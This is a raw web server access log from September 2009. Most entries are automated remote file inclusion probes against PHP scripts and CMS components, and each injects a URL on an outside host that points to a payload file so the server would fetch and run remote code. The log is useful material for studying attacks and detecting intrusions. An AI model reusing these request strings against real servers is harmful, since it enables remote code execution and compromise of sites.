81.24.35.80 - - [07/Sep/2009:09:12:25 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 355 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
99.198.106.178 - - [07/Sep/2009:09:12:32 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:09:12:32 -0500] "GET /logs/access_log.1236211200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:09:12:32 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.106.211 - - [07/Sep/2009:09:12:34 -0500] "GET /logs/access_log.1249257600 HTTP/1.0" 200 571441 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.75.245.36 - - [07/Sep/2009:09:13:06 -0500] "GET /logs/access_log.1239667200/s_loadenv.inc.php?DOCUMENT_ROOT=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 327 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:09:13:16 -0500] "GET /logs//include/write.php?dir=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:09:13:16 -0500] "GET /logs/access_log.1244764800//include/write.php?dir=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.122.72.216 - - [07/Sep/2009:09:13:16 -0500] "GET //include/write.php?dir=http://www.compassionbydesign.org/wp-content/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:09:13:41 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:09:13:41 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
99.198.106.178 - - [07/Sep/2009:09:13:41 -0500] "GET /logs/access_log.1236211200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.korearafting.net/bbs/1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:09:13:51 -0500] "GET //skin/zero_vote/admin.php?dir=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:09:13:52 -0500] "GET /logs//skin/zero_vote/admin.php?dir=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:09:13:56 -0500] "GET /logs/access_log.1240012800//skin/zero_vote/admin.php?dir=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
94.136.37.141 - - [07/Sep/2009:09:15:40 -0500] "GET //?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
94.136.37.141 - - [07/Sep/2009:09:15:40 -0500] "GET /logs/access_log.1240531200//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
69.64.84.44 - - [07/Sep/2009:09:15:44 -0500] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
69.64.84.44 - - [07/Sep/2009:09:15:44 -0500] "GET //lostpasswd.php?env[include_prefix]=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.24.35.80 - - [07/Sep/2009:09:15:46 -0500] "GET /logs/access_log.1246233600//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 377 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
94.136.37.141 - - [07/Sep/2009:09:15:48 -0500] "GET /logs//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 200 204075 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
69.64.84.44 - - [07/Sep/2009:09:15:52 -0500] "GET /logs//lostpasswd.php?env[include_prefix]=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
69.64.84.44 - - [07/Sep/2009:09:15:53 -0500] "GET //lostpasswd.php?env[include_prefix]=http://www.seorakhoney.com/shop/mail/kts.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
94.136.37.141 - - [07/Sep/2009:09:15:56 -0500] "GET /logs/access_log.1242864000//?_zb_path=http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
218.27.203.107 - - [07/Sep/2009:09:16:16 -0500] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.27.203.107 - - [07/Sep/2009:09:16:18 -0500] "GET /logs/access_log.1244764800/community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
216.65.20.79 - - [07/Sep/2009:09:16:39 -0500] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 311 "-""libwww-perl/5.814"
216.65.20.79 - - [07/Sep/2009:09:16:39 -0500] "GET //classes/adodbt/sql.php?classes_dir=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.814"
216.65.20.79 - - [07/Sep/2009:09:16:58 -0500] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.814"
216.65.20.79 - - [07/Sep/2009:09:17:00 -0500] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.814"
216.65.20.79 - - [07/Sep/2009:09:17:03 -0500] "GET /logs/SQuery/lib/gore.php?libpath=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.814"
216.65.20.79 - - [07/Sep/2009:09:17:03 -0500] "GET /SQuery/lib/gore.php?libpath=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.814"
81.24.35.80 - - [07/Sep/2009:09:17:05 -0500] "GET /logs/access_log.1244419200//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 377 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5"
69.64.84.44 - - [07/Sep/2009:09:17:51 -0500] "GET /logs/access_log.1238112000/modules/news/archivednews.php?GLOBALS[language_home]=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 339 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:09:17:51 -0500] "GET /logs/modules/news/archivednews.php?GLOBALS[language_home]=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 317 "-""Mozilla/5.0"
69.64.84.44 - - [07/Sep/2009:09:17:52 -0500] "GET /modules/news/archivednews.php?GLOBALS[language_home]=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
94.75.245.36 - - [07/Sep/2009:09:18:26 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 327 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
94.75.245.36 - - [07/Sep/2009:09:18:26 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 300 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
94.75.245.36 - - [07/Sep/2009:09:18:26 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 305 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
82.151.132.176 - - [07/Sep/2009:09:18:50 -0500] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://jonrothbard.com/one.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
82.151.132.176 - - [07/Sep/2009:09:18:50 -0500] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://jonrothbard.com/one.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
82.151.132.176 - - [07/Sep/2009:09:18:50 -0500] "GET /logs/access_log.1244160000//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://jonrothbard.com/one.txt? HTTP/1.1" 404 379 "-""Mozilla/5.0"
216.65.20.79 - - [07/Sep/2009:09:19:21 -0500] "GET /logs/surveys/survey.inc.php?path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.814"
216.65.20.79 - - [07/Sep/2009:09:19:22 -0500] "GET /surveys/survey.inc.php?path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.814"
194.105.193.46 - - [07/Sep/2009:09:20:34 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 305 "-""Mozilla/5.0"
194.105.193.46 - - [07/Sep/2009:09:20:34 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 300 "-""Mozilla/5.0"
194.105.193.46 - - [07/Sep/2009:09:20:34 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 327 "-""Mozilla/5.0"
82.151.132.176 - - [07/Sep/2009:09:20:35 -0500] "GET /logs/access_log.1248048000//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://jonrothbard.com/one.txt? HTTP/1.1" 404 379 "-""Mozilla/5.0"
216.65.20.79 - - [07/Sep/2009:09:21:50 -0500] "GET //embed/day.php?path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.814"
216.65.20.79 - - [07/Sep/2009:09:21:50 -0500] "GET /logs//embed/day.php?path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.814"
194.105.193.46 - - [07/Sep/2009:09:22:51 -0500] "GET /logs/access_log.1239667200/s_loadenv.inc.php?DOCUMENT_ROOT=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.65.20.79 - - [07/Sep/2009:09:23:52 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 303 "-""libwww-perl/5.814"
216.65.20.79 - - [07/Sep/2009:09:23:52 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
117.110.59.2 - - [07/Sep/2009:09:24:11 -0500] "GET /logs/access_log.1242950400/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:09:24:11 -0500] "GET /?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:09:24:13 -0500] "GET /logs/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:09:24:20 -0500] "GET /logs/access_log.1241308800/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:09:24:34 -0500] "GET /?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:09:24:34 -0500] "GET /logs/access_log.1242950400/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:09:24:36 -0500] "GET /logs/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
117.110.59.2 - - [07/Sep/2009:09:24:41 -0500] "GET /logs/access_log.1241308800/?mosConfig_absolute_path=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.101.214.52 - - [07/Sep/2009:09:27:22 -0500] "GET /logs/access_log.1244764800/community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 352 "-""Mozilla/5.0"
121.101.214.52 - - [07/Sep/2009:09:27:23 -0500] "GET /logs/community/modules/agendax/addevent.inc.php?agendax_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
65.55.106.187 - - [07/Sep/2009:09:28:36 -0500] "GET /logs/access_log.1143244800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.75.245.36 - - [07/Sep/2009:09:32:12 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
94.75.245.36 - - [07/Sep/2009:09:32:12 -0500] "GET /logs/access_log.1237075200/includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 337 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
94.75.245.36 - - [07/Sep/2009:09:32:12 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
87.98.252.56 - - [07/Sep/2009:09:32:49 -0500] "GET /logs/access_log.1232755200//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://www.traceback-ip.eu/master-id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.75.245.36 - - [07/Sep/2009:09:32:51 -0500] "GET /logs/access_log.1244764800/includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 337 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
217.117.85.108 - - [07/Sep/2009:09:33:00 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 300 "-""Mozilla/5.0"
217.117.85.108 - - [07/Sep/2009:09:33:00 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 305 "-""Mozilla/5.0"
217.117.85.108 - - [07/Sep/2009:09:33:00 -0500] "GET /logs/access_log.1233619200/s_loadenv.inc.php?DOCUMENT_ROOT=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 327 "-""Mozilla/5.0"
65.55.207.95 - - [07/Sep/2009:09:33:33 -0500] "GET /logs/ HTTP/1.0" 200 203715 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.65.20.79 - - [07/Sep/2009:09:34:28 -0500] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 303 "-""libwww-perl/5.814"
216.65.20.79 - - [07/Sep/2009:09:34:28 -0500] "GET /akocomments.php?mosConfig_absolute_path=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
65.55.106.163 - - [07/Sep/2009:09:34:33 -0500] "GET /logs/access_log.1152316800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.75.245.36 - - [07/Sep/2009:09:34:41 -0500] "GET /logs/access_log.1246406400/includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 337 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
94.75.245.36 - - [07/Sep/2009:09:35:16 -0500] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 337 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
58.184.252.3 - - [07/Sep/2009:09:35:25 -0500] "GET /logs/access_log.1240185600/GradeMap/index.php?page=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
58.184.252.3 - - [07/Sep/2009:09:35:26 -0500] "GET /GradeMap/index.php?page=http://www.cascadecollision.com////components/dialog/fx29id1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
217.117.85.108 - - [07/Sep/2009:09:37:41 -0500] "GET /logs/access_log.1239667200/s_loadenv.inc.php?DOCUMENT_ROOT=http://beep-beep.ru/scripts/x? HTTP/1.1" 404 327 "-""Mozilla/5.0"
194.105.193.46 - - [07/Sep/2009:09:38:31 -0500] "GET /logs/access_log.1246579200/includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 337 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
194.105.193.46 - - [07/Sep/2009:09:38:31 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 315 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
194.105.193.46 - - [07/Sep/2009:09:38:31 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
194.105.193.46 - - [07/Sep/2009:09:41:23 -0500] "GET /logs/access_log.1246406400/includes/ktedit/toolbar.php?dirDepth=http://asociados.edu.do/administrator/components/com_moofaq/css/sape?%0D? HTTP/1.1" 404 337 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
65.55.107.179 - - [07/Sep/2009:09:45:02 -0500] "GET /logs/access_log.1220400000 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.136.251 - - [07/Sep/2009:09:45:41 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
218.38.136.251 - - [07/Sep/2009:09:45:42 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
216.65.20.79 - - [07/Sep/2009:09:45:51 -0500] "GET //include/write.php?dir=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.814"
216.65.20.79 - - [07/Sep/2009:09:45:51 -0500] "GET /logs//include/write.php?dir=http://www.ssp.co.id/admin/admin/id.txt???? HTTP/1.1" 404 306 "-""libwww-perl/5.814"
72.29.82.154 - - [07/Sep/2009:09:49:41 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:09:49:41 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:09:49:41 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:09:49:42 -0500] "GET /logs/access_log.1235088000//admin/spaw/spaw_control.class.php?spaw_root=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.206.123.177 - - [07/Sep/2009:09:51:36 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.206.123.177 - - [07/Sep/2009:09:51:36 -0500] "GET /logs/access_log.1248048000//bbs//skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
211.206.123.177 - - [07/Sep/2009:09:51:36 -0500] "GET /logs/access_log.1247356800//bbs//skin/ggambo7002_board/write.php?dir=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:09:54:00 -0500] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:09:54:00 -0500] "GET /logs/access_log.1230249600//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:09:54:00 -0500] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:00:50 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:00:50 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:00:50 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:00:50 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:00:50 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:00:50 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:00:50 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:00:50 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:00:50 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:00:55 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:00:55 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:00:55 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:01:25 -0500] "GET /logs/access_log.1233619200////?_SERVER%5BDOCUMENT_ROOT%5D=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:01:25 -0500] "GET ////?_SERVER%5BDOCUMENT_ROOT%5D=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:01:29 -0500] "GET /logs////?_SERVER%5BDOCUMENT_ROOT%5D=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 200 204077 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:10:02:07 -0500] "GET /phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:10:02:07 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:10:02:07 -0500] "GET /logs/access_log.1247356800/phphtml.php?htmlclass_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:02:53 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
81.176.226.186 - - [07/Sep/2009:10:02:55 -0500] "GET /logs/access_log.1243468800/?binn_include_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.176.226.186 - - [07/Sep/2009:10:02:55 -0500] "GET /?binn_include_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:10:02:56 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
81.176.226.186 - - [07/Sep/2009:10:02:57 -0500] "GET /logs/?binn_include_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
81.176.226.186 - - [07/Sep/2009:10:03:08 -0500] "GET /logs/access_log.1243900800/?binn_include_path=http://korcacity.com/tmp/id.gif? HTTP/1.1" 404 310 "-""Mozilla/5.0"
